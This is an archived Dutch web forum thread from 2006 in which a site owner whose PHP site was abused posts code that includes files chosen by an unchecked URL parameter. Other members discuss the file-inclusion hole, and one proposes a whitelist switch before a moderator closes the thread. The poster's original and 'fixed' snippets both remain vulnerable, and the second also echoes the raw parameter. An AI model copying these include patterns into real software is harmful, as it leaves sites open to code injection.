Digitaal onderwijsmateriaal, leermateriaal voor hbo


  • Reinstein
  • Registratie: Juni 2003
  • Laatst online: 03-12-2025

Reinstein

Half-Nul

GlowMouse schreef op donderdag 06 juli 2006 @ 20:56:
[...]

Makkelijk misschien wel, maar dit kost je een extra Apache request per include. Erg zonde van de resources, en nog traag ook.
Dat werkt niet hoor, want als je via http een php script opvraag wordt dat eerst geparsed voor dat het opgestuurd word, ook als is het lokaal.

Wat deze hacker doet is, het bestand een andere extensie geven zodat het rechtstreeks over gaat.

En dan kan het idd geinclude worden.

Open source modeltrein besturings software


  • Tranzy
  • Registratie: Augustus 2001
  • Laatst online: 09-01 07:58
code:
1
2
3
4
5
6
if (file_exists($_GET["p"] . "inc.php")) {
{

  include_once ($_GET["p"] . "inc.php");
    
}


Wat ik verder niet snap.... Hoe kunnen zij mijn code aanpassen zonder over de juiste gegevens te beschikken ?

[ Voor 45% gewijzigd door Tranzy op 06-07-2006 21:21 ]

Ik heb ook een leuke computer..


  • GlowMouse
  • Registratie: November 2002
  • Niet online
Tranzy schreef op donderdag 06 juli 2006 @ 21:11:
Wat ik verder niet snap.... Hoe kunnen zij mijn code aanpassen zonder over de juiste gegevens te beschikken ?
Jouw code wordt niet aangepast, jou code wordt alleen gebruikt op een manier die je niet voorzien had.

  • Dersan
  • Registratie: Augustus 2004
  • Laatst online: 10:22
Moet je al die bandbreedte zelf betalen? :|

  • Tranzy
  • Registratie: Augustus 2001
  • Laatst online: 09-01 07:58
Wat in het mailtje staat is alles wat ik van het hosting bedrijf vernomen heb

[ Voor 14% gewijzigd door Tranzy op 06-07-2006 21:36 ]

Ik heb ook een leuke computer..


  • Tranzy
  • Registratie: Augustus 2001
  • Laatst online: 09-01 07:58
Ik heb er nu dit in gezet:

code:
1
2
3
4
5
6
7
8
9
if (file_exists($_GET["p"] . ".inc.php")) 
{

  include_once ($_GET["p"] . ".inc.php");
    
} else {

  echo "Kan bestand " . $_GET["p"] . ".inc.php niet vinden.";
}

Ik heb ook een leuke computer..


  • Quadro!
  • Registratie: Maart 2004
  • Laatst online: 13-02 16:14
Wat ik niet helemaal begrijp is dat hier 2 pagina's aan kan worden gewijd. Nofi, maar als de TS dat artikel even had doorgelezen en aan de hand daarvan eventueel wat gerichtere vragen had gesteld was het probleem nu prolly opgelost :+

edit: http://www.devshed.com/c/a/PHP/PHP-Security-Mistakes/ <= die link dus :)

[ Voor 18% gewijzigd door Quadro! op 06-07-2006 21:43 ]


  • mithras
  • Registratie: Maart 2003
  • Niet online
Tranzy schreef op donderdag 06 juli 2006 @ 21:41:
Ik heb er nu dit in gezet:

code:
1
2
3
4
5
6
7
8
9
if (file_exists($_GET["p"] . ".inc.php")) 
{

  include_once ($_GET["p"] . ".inc.php");
    
} else {

  echo "Kan bestand " . $_GET["p"] . ".inc.php niet vinden.";
}
En als je nu gewoon een switch maakt:
PHP:
1
2
3
4
5
6
7
8
9
10
switch($_GET['p']) {
  case 'mogelijkheid1':
    include('mogelijkheid1.inc.php');
    break;
  case 'mogelijkheid2':
    include('mogelijkheid2.inc.php');
    break;
  default:
    include('home.inc.php');
}

  • NMe
  • Registratie: Februari 2004
  • Laatst online: 22-01 23:51

NMe

Quia Ego Sic Dico.

Ik ga hier een einde aan maken. Om te beginnen zit je in het foute subforum: PHP zut is serverside, en serverside scripting hoort in Programming, zoals je in Waar hoort mijn topic? had kunnen lezen. Daarnaast is er daar meer dan genoeg te vinden over hoe je een site het beste beveiligt, te beginnen met een speciaal voor dat doel geschreven FAQ. Daarnaast zijn er nog talloze topics geweest in Programming die hetzelfde onderwerp beslaan. Over cross site scripting, SQL inject, code injectie, enz, enz, enz is meer dan genoeg te vinden als je even de search gebruikt.

Dan is er nog het verloop van dit topic. Ik zie een schreeuwerige/paniekerige topictitel, en in het topic zelf zie ik niet veel meer dan een codedump en de vraag om anderen je code te laten debuggen. Daar zijn we hier niet voor; debuggen moet je zelf kunnen. We willen je best helpen als je je probleem zelf al een beetje geisoleerd hebt, maar dit hele topic komt gewoon over alsof je direct na het ontvangen van die mail een topic hebt gestart zonder eerst zelf eens wat uit te zoeken. Of dat ook zo is weet ik niet, maar het komt in elk geval zo over, en daar hebben we hier geen zin in. :)

Om bovenstaande redenen doe ik je topic dicht in plaats van het te verplaatsen. Probeer middels de search tot een oplossing te komen, dat moet zonder problemen lukken.

'E's fighting in there!' he stuttered, grabbing the captain's arm.
'All by himself?' said the captain.
'No, with everyone!' shouted Nobby, hopping from one foot to the other.

Pagina: 1

Dit topic is gesloten.